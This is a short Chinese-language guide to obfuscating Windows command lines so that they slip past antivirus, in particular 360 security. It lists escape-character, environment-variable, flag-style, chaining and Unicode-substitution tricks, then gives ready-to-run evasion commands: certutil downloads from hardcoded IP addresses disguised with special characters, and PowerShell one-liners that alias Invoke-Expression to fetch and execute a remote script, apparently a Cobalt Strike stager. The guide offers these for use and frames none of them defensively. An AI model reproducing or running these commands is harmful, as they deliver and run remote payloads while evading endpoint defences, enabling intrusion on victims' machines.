1、(转义符)和""
双引号必须成对出现,每个字符中间只能出现一次
image.png

2、利用环境变量进行混淆
set命令查看环境变量
image.png
环境变量截断:%computername:~3,1%
解释:~3表示从第三位开始截取,1表示截取长度为1
image.png

3、参数linux化
windows下命令参数大都以/开头,实际上大部分命令都支持linux的参数标准,使用-代表参数。
image.png

4、命令拼接
commanda && commandb拼接符号代表commanda执行后自动执行commandb
image.png
commanda | commandb拼接符号代表commanda命令的输出结果作为commandb命令执行的输入
image.png

5、特殊字符插入
用类似的字符替换命令行中的其他字符
certutil /⸿split -ur₏lcache -f http://192.168.1.102:1337/axgg.txt axgg.txt

6、Bypass360拦截

Bypass下载拦截
certutil -split -f -urlca“”che http://8.8.8.8/a.txt #中文双引号
certutil /⸿split -ur₏lcache -f http://192.168.1.102:1337/axgg.txt axgg.txt  #特殊字符

Bypass powershell cs
powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.52.23:80/a')
echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.52.23:80/a') | powershell -

Q.E.D.